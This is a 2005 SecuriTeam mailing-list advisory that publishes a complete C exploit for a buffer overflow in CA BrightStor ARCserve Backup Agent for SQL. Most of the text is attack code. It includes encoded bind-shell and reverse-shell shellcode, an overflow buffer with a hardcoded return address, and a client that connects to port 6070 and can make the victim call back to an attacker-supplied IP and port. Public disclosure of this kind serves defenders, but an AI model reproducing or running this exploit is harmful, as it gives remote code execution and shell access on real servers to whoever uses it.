[EXPL] CA BrightStor ARCserve Backup Agent for SQL (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 08/18/05

  • Next message: SecuriTeam: "[NT] NetworkActiv Web Server Directory Traversal" 
    To: list@securiteam.com
Date: 18 Aug 2005 17:01:18 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      CA BrightStor ARCserve Backup Agent for SQL (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    Computer Associates International Inc's BrightStor ARCserve Backup
    UniversalAgent allows attackers to execute arbitrary code. For more
    information see our previously published article:
    <http://www.securiteam.com/windowsntfocus/5LP0620GKI.html> CA BrightStor
    ARCserve Backup Agent For MS SQL Server Buffer Overflow. Provided below is
    an exploit for the vulnerability in ARCserve Backup Agent for SQL.

    DETAILS

    Exploit Code:
    /*
     * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
     *
     * cybertronic[at]gmx[dot]net
     *
     */

    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define PORT 6070

    unsigned char bindshell[] =
    "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
    "\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
    "\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
    "\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
    "\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
    "\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
    "\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
    "\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
    "\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
    "\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
    "\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
    "\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
    "\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
    "\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
    "\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
    "\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
    "\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
    "\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
    "\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
    "\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
    "\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
    "\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
    "\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
    "\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
    "\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
    "\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
    "\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
    "\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
    "\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
    "\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
    "\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
    "\x80\x2f\xa2\x04";

    unsigned char reverseshell[] =
    "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
    "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
    "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
    "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
    "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
    "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
    "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
    "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
    "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
    "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
    "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
    "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
    "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
    "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
    "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
    "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
    "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

    void
    exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
    {
     unsigned long pushesp = 0x20c0c1ab;
     char buffer[3289];

     bzero ( &buffer, sizeof ( buffer ) );
     memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
     memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
     memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
     memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

     if ( option == 0 )
     {
      memcpy ( &reverseshell[111], &cbip, 4);
      memcpy ( &reverseshell[118], &cbport, 2);
      memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
     }
     else
      memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

     printf ( "attacking with %u bytes...", strlen ( buffer ) );
     write ( s, buffer, strlen ( buffer ) );
     printf ( "done!\n" );
     close ( s );
    }

    int
    main ( int argc, char* argv[] )
    {
     int s;
     unsigned long cbip;
     unsigned short cbport;
     struct sockaddr_in remote_addr;
     struct hostent* host_addr;

     if ( argc != 2 )
      if ( argc != 4 )
       { fprintf ( stderr, "Usage\n-----\n[bindshell] %s \n[reverseshell] %s
    \n", argv[0], argv[0] ); exit ( 1 ); }

     if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
      { fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1
    ); }

     remote_addr.sin_family = AF_INET;
     remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
     remote_addr.sin_port = htons ( PORT );

     s = socket ( AF_INET, SOCK_STREAM, 0 );
     printf ( "connecting to %s:%u...", argv[1], PORT );
     if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct
    sockaddr ) ) == -1 )
      { printf ( "failed!\n" ); exit ( 1 ); }
     printf ( "ok!\n" );

     if ( argc == 4 )
     {
      cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
      cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
      exploit ( s, cbip, cbport, 0 );
     }
     else
      exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
    }

    ADDITIONAL INFORMATION

    The original article can be found at:
    <http://www.livejournal.com/users/cybertronic/>
    http://www.livejournal.com/users/cybertronic/

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] NetworkActiv Web Server Directory Traversal"

    Relevant Pages